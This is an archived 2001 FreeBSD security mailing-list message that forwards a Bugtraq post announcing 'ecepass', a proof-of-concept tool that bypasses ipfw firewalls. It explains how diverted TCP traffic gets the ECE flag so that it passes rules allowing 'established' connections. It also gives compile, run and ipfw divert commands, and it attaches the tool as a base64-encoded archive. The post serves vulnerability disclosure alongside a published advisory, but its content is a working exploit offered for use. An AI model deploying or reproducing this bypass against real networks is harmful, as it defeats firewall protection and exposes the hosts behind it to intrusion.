From owner-freebsd-security Mon Jan 29 8: 7:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from libertad.univalle.edu.co (unknown [200.24.102.11]) by hub.freebsd.org (Postfix) with ESMTP id B53E737B699 for ; Mon, 29 Jan 2001 08:07:24 -0800 (PST) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id f0TGIiw27226 for ; Mon, 29 Jan 2001 11:18:50 -0500 (COT) Date: Mon, 29 Jan 2001 11:18:44 -0500 (COT) From: Buliwyf McGraw To: freebsd-security@FreeBSD.ORG Subject: ecepass - proof of concept code for FreeBSD ipfw bypass (fwd) Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/Mixed; BOUNDARY="0-1467619970-980427870=:401" Content-ID: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-1467619970-980427870=:401 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Very interesting... ---------- Forwarded message ---------- Date: Thu, 25 Jan 2001 15:04:30 +0200 From: Roelof Temmingh To: BUGTRAQ@SECURITYFOCUS.COM Subject: ecepass - proof of concept code for FreeBSD ipfw bypass An all ZA production...;) FreeBSD ipfw+ECE proof of concept code -------------------------------------- Code written by: Plathond (jacques4i@yahoo.com) for Sensepost (http://www.sensepost.com, info@sensepost.com) More info on the problem: http://packetstorm.securify.com/advisories/freebsd/FreeBSD-SA-01:08.ipfw Original problem found by: Aragon Gouveia How it works: ------------- Using FreeBSD divert rule, all outgoing traffic (or as specified in ipfw rule) will be diverted to the ecepass process - the ECE flag will be added. Traffic directed to hosts behind ipfw-based firewall will be passed, rendering the firewall useless if it makes use of the "allow all from any to any established" rule. Tried & tested... How to use: ----------- 1. Make sure your kernel is compiled with the following options: options IPDIVERT options IPFIREWALL 2. gcc -o ecepass ecepass.c 3. ./ecepass & 4. ipfw add 5 divert 7000 tcp from any to any 5. All TCP traffic will now have the ECE flag added to it. PS1: obviously you need to make sure that the last ipfw rule allows traffic e.g.: 00001 divert 7000 tcp from any to any 65535 allow ip from any to any PS2: as the exploit uses "ipfw divert" it only works on FreeBSD. Ironic eh? spidermark: sensepostdata ece Regards, Roelof. ------------------------------------------------------ Roelof W Temmingh SensePost IT security roelof@sensepost.com +27 83 448 6996 http://www.sensepost.com --0-1467619970-980427870=:401 Content-Type: APPLICATION/OCTET-STREAM; NAME="ecepass.tgz" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: ATTACHMENT; FILENAME="ecepass.tgz" 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 03gaT+NpfGH8BxhfD08AKAAA --0-1467619970-980427870=:401-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message